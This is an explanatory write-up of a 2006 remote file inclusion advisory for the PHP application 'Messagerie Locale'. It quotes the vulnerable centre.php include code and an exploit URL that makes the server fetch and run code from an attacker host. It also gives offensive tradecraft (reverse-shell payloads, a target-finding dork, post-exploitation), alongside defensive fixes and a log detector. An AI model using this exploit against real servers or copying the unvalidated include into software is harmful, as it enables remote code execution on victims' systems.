Messagerie Locale 'centre.php' Remote File Inclusion Explained

What this paper is
This paper describes a Remote File Inclusion (RFI) vulnerability in a web application called "Messagerie Locale". The vulnerability exists in the centre.php file, which is part of the application. The author, DaDIsS, explains how an attacker can exploit this flaw to include and execute arbitrary files from a remote server, potentially leading to code execution on the victim's web server.
Simple technical breakdown
The core of the vulnerability lies in how the centre.php script handles user input. It takes a parameter named page from the URL. If this page parameter is provided, the script uses its value to include another PHP file. The problem is that the script doesn't properly sanitize or validate the page parameter. This allows an attacker to provide a URL pointing to a malicious file on their own server instead of a local file. When the script includes this remote file, it effectively executes the attacker's code on the victim's server.
Complete code and payload walkthrough
The paper provides a snippet of the vulnerable PHP code:
    <?
    if(isset($_GET['page']))
    {
        $page=$_GET['page'];
    }
    else
    {
        $page="";
    }
    if (empty($page)||!isset($page))
    {
        include("accueil.php");
    }
    else
    {
        include($page.".php");
    }
    ?>

Let's break this down:
- <? ... ?>: These are PHP opening and closing tags (the short form <? rather than <?php), indicating that the enclosed code is to be interpreted as PHP.
- if(isset($_GET['page'])) { ... } else { ... }:
  - isset($_GET['page']): Checks whether a variable named page has been set in the URL's query string (e.g., ?page=something).
  - $page=$_GET['page'];: If page is set, its value is assigned to the PHP variable $page.
  - $page="";: If page is not set, the $page variable is initialized as an empty string.
- if (empty($page)||!isset($page)) { ... } else { ... }: This is the crucial part for the vulnerability.
  - empty($page): Checks whether $page is considered empty (e.g., "", 0, "0", null, false, an empty array).
  - !isset($page): Checks whether $page is not set. This condition is redundant here because the else block of the previous if statement ensures $page is always set (either to a value from $_GET or to an empty string).
  - include("accueil.php");: If $page is empty or not set, the script includes a local file named accueil.php. This is the default behaviour when no page parameter is provided.
  - include($page.".php");: This is where the RFI occurs. If $page is not empty, the script attempts to include the file named by $page followed by the .php extension.
Mapping of code fragments to practical purpose:
- isset($_GET['page']): Detects whether the attacker is trying to control the page parameter.
- $page=$_GET['page'];: Captures the attacker's input for the page parameter.
- include($page.".php");: The vulnerable call that includes content directly based on user input, leading to RFI.
Payload/Exploit Example:
The paper provides an example URL: http://www.victime.com/(path)/centre.php?page=http://attacker
- http://www.victime.com/(path)/centre.php: The target URL pointing to the vulnerable script on the victim's server.
- ?page=http://attacker: The malicious input.
  - page=: The parameter name being manipulated.
  - http://attacker: The attacker-controlled URL.
When this URL is accessed, the PHP code will execute include("http://attacker.php");. If the attacker has set up a server at http://attacker that serves a file named attacker.php (or if the server is configured to interpret http://attacker as a PHP file), the content of that remote file will be fetched and executed by the victim's PHP interpreter.
Practical details for offensive operations teams
Required Access Level: Low. This is a web-based vulnerability, typically exploitable by any user who can send HTTP requests to the vulnerable web application. No prior authentication or elevated privileges on the web server are usually required.
Lab Preconditions:
- A target web server running PHP.
- The "Messagerie Locale" application (or a similar application with the same vulnerable centre.php code) installed and accessible via HTTP.
- An attacker-controlled server (e.g., a VPS or a cloud instance) capable of serving arbitrary files via HTTP. This server hosts the malicious PHP payload.
- The attacker's server must be reachable from the target's network.
Tooling Assumptions:
- A web browser for manual testing and reconnaissance.
- An HTTP proxy (like Burp Suite or OWASP ZAP) for intercepting and modifying requests.
- A simple HTTP server (like Python's http.server or Nginx) on the attacker's machine to serve the payload.
- A tool for generating PHP shellcode (e.g., Metasploit's php/meterpreter/reverse_tcp payload, or custom PHP webshells).
Execution Pitfalls:
- File Extension Handling: The exploit relies on include($page.".php");. If the attacker's payload is not named attacker.php (e.g., it is shell.txt), they might need to adjust their URL to http://attacker/shell.txt? (which becomes http://attacker/shell.txt?.php after the append) or use similar techniques to bypass the .php append. Some web servers might also block direct inclusion of remote URLs.
- allow_url_fopen Directive: The PHP allow_url_fopen directive (and, on PHP 5.2 and later, allow_url_include as well) must be enabled on the victim's server for include() to fetch remote files. If it is disabled, RFI will not work, and the exploit will likely fail or only include local files.
- Firewall/Network Restrictions: The victim's server might have outbound firewall rules preventing it from connecting to the attacker's server.
- Input Filtering/WAF: A Web Application Firewall (WAF) might detect and block requests containing URLs in the page parameter.
- Payload Execution: The included file must contain valid PHP code that can be executed. If the attacker includes a non-PHP file or invalid PHP, it might be displayed as text or cause a PHP parse error.
- Path Traversal vs. RFI: The code snippet include($page.".php"); is susceptible to RFI. If the intention was to include local files and the application only allowed local paths, path traversal (../../) might be a separate vulnerability, but RFI specifically targets the ability to include remote URLs.
Tradecraft Considerations:
- Reconnaissance: Identify the target application and version. Use search engines (e.g., the Google dork mentioned in the paper: inurl:indexmess.php) to find potential targets.
- Payload Hosting: Ensure the attacker's server is stable and can serve the payload quickly and reliably.
- Obfuscation: If WAFs are suspected, consider basic obfuscation techniques for the payload URL or the payload itself, though this specific exploit is quite direct.
- Post-Exploitation: Once a shell is obtained, maintain persistence, escalate privileges, and exfiltrate data discreetly.
Where this was used and when
- Context: This vulnerability was described in 2006. At that time, RFI was a common and potent vulnerability in PHP web applications. Applications that didn't properly validate user input used in file inclusion functions were widespread.
- Approximate Years/Dates: The paper was published on 2006-11-23. This type of vulnerability was prevalent in the mid-2000s and continued to be a significant threat until developers became more aware and implemented better input validation and security configurations.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user input. Always validate and sanitize any data received from external sources, especially when it's used in file operations, database queries, or command execution.
- Disable allow_url_fopen and allow_url_include: For most web applications, there is no legitimate reason for PHP to open remote URLs. Disabling allow_url_fopen in php.ini prevents include(), require(), fopen(), etc., from accessing remote files. allow_url_include specifically prevents include() and require() from including remote files, but disabling allow_url_fopen is the broader security measure.
- Use Whitelisting: Instead of trying to blacklist potentially dangerous inputs, use a whitelist approach. Define exactly which files or paths are allowed to be included and reject everything else.
- Secure Configuration: Regularly review PHP and web server configurations to ensure security best practices are followed.
- Web Application Firewalls (WAFs): While not a silver bullet, WAFs can help detect and block common attack patterns like RFI. However, they should be used as a defense-in-depth measure, not as the primary security control.
- Regular Patching and Updates: Keep all web applications and their underlying frameworks/libraries updated to patch known vulnerabilities.
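As an added example (not code from Messagerie Locale or from the paper), this is how the include logic of centre.php could be rewritten around a whitelist so that the page parameter selects a key, never a path or URL; every page name other than accueil and the directory layout are assumptions.

```php
<?php
// Added example (not the Messagerie Locale code): hardened replacement for the
// include logic in centre.php. Only "accueil" comes from the original snippet;
// the other page names and the directory layout are assumed.
declare(strict_types=1);

// The user supplies a key into this map, never a path or URL, so a value such
// as http://attacker can never reach include().
const ALLOWED_PAGES = [
    'accueil' => 'accueil.php',   // default page, from the original code
    'lire'    => 'lire.php',      // assumed page name
    'ecrire'  => 'ecrire.php',    // assumed page name
];

// Resolves the requested page to an absolute path inside $baseDir.
function resolvePage(?string $requested, string $baseDir = __DIR__): string
{
    // Missing, empty or unknown keys fall back to the original default
    // instead of being concatenated into a file name.
    if ($requested === null || !array_key_exists($requested, ALLOWED_PAGES)) {
        $requested = 'accueil';
    }
    $path = $baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$requested];

    // Defence in depth: the resolved file must exist and sit inside $baseDir,
    // so a mistake in the map cannot turn into traversal.
    $real = realpath($path);
    $base = realpath($baseDir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('page resolved outside the allowed directory');
    }
    return $real;
}

// Belt and braces: the directive the paper discusses should be off anyway.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('centre.php: allow_url_include is enabled; set it to Off in php.ini');
}

// Only string values are accepted; ?page[]=x arrives as an array and is ignored.
$page = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : null;
include resolvePage($page);
```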
ASCII visual (if applicable)
+-----------------+       +------------------------+       +----------------------+
| Attacker Server | ----> |   Victim Web Server    | ----> |  Victim PHP Process  |
| (e.g., attacker)|       | (e.g., www.victime.com)|       | (running centre.php) |
+-----------------+       +------------------------+       +----------------------+
        ^                                                             |
        | Serves malicious                                            | Receives and
        | PHP file (e.g.,                                             | includes the
        | attacker.php)                                               | remote file
        |                                                             |
        +-------------------------------------------------------------+

Explanation of the visual:
The diagram shows the flow of an RFI attack. The attacker's server hosts a malicious PHP file. The victim's web server receives an HTTP request that targets the centre.php script with a page parameter pointing to the attacker's server. The victim's PHP process, running centre.php, then makes an outbound HTTP request to fetch the malicious file from the attacker's server and executes it as if it were a local file.
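An added example, not part of the paper, showing what the inbound half of this flow looks like to a defender: a PHP 8 function that flags access-log lines in which centre.php is requested with a URL (or a traversal sequence) in the page parameter. The log lines are constructed samples and the field layout assumes the common combined log format.

```php
<?php
// Added example, not from the original paper: flag access-log lines that carry
// a URL in the centre.php "page" parameter, the request shape the exploit URL
// above uses. The sample log lines below are constructed.
declare(strict_types=1);

// Returns the offending page value, or null when the line looks benign.
function rfiAttemptInLine(string $line): ?string
{
    // Combined log format: the request line is the first quoted field.
    if (!preg_match('/"(?:GET|POST)\s+(\S+)\s+HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    // Split the request target by hand; parse_url() is quirky with
    // "://" inside a query string.
    $parts = explode('?', $m[1], 2);
    $path  = $parts[0];
    $query = $parts[1] ?? '';
    if (!str_ends_with($path, '/centre.php') || $query === '') {
        return null;
    }
    parse_str($query, $params);          // decodes %3A etc. exactly like $_GET
    $page = $params['page'] ?? null;
    if (!is_string($page)) {
        return null;
    }
    // A legitimate page name in this application is a bare file stem, so any
    // scheme prefix (http:, https:, ftp:, php:, data:) or ".." is suspicious.
    if (preg_match('#^\s*[a-z][a-z0-9+.\-]*:#i', $page) || str_contains($page, '..')) {
        return $page;
    }
    return null;
}

// Constructed sample log lines (documentation IP ranges, no real hosts).
$sampleLog = [
    '203.0.113.7 - - [23/Nov/2006:10:01:02 +0100] "GET /mess/centre.php?page=lire HTTP/1.1" 200 512',
    '198.51.100.9 - - [23/Nov/2006:10:02:15 +0100] "GET /mess/centre.php?page=http://attacker HTTP/1.1" 200 77',
    '198.51.100.9 - - [23/Nov/2006:10:02:40 +0100] "GET /mess/centre.php?page=http%3A%2F%2Fattacker/shell.txt%3F HTTP/1.1" 200 77',
    '192.0.2.4 - - [23/Nov/2006:10:03:00 +0100] "GET /mess/indexmess.php HTTP/1.1" 200 2048',
];

foreach ($sampleLog as $line) {
    $hit = rfiAttemptInLine($line);
    if ($hit !== null) {
        echo "RFI attempt: page=" . $hit . "\n";   // fires for the two attacker lines only
    }
}
```

Pair this with outbound-connection monitoring on the web server: the second half of the flow is the PHP process itself opening an HTTP connection to a host it has no business talking to.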
Source references
- Paper ID: 2832
- Paper Title: Messagerie Locale - 'centre.php' Remote File Inclusion
- Author: DaDIsS
- Published: 2006-11-23
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2832
- Raw Exploit URL: https://www.exploit-db.com/raw/2832
Original Exploit-DB Content (Verbatim)
#===================================================================================#
#
# Messagerie Locale => (centre.php) $page Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : Messagerie Locale
# Url : http://dvmet.free.fr/script/messagerie.zip
# Dork : inurl:indexmess.php
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation :
#
#
# The flaw resides in centre.php file that contain this code :
#
# <?
# if(isset($_GET['page']))
# {
# $page=$_GET['page'];
# }
# else
# {
# $page="";
# }
#
# if (empty($page)||!isset($page))
# {
# include("accueil.php");
# }
# else
# {
# include($page.".php");
# }
#
# ?>
#
#===================================================================================#
#
# Example :
#
#
# http://www.victime.com/(path)/centre.php?page=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / dadiss@virtuaplanet.net
# Proud to be a Moroccan !
#
#===================================================================================#
# milw0rm.com [2006-11-23]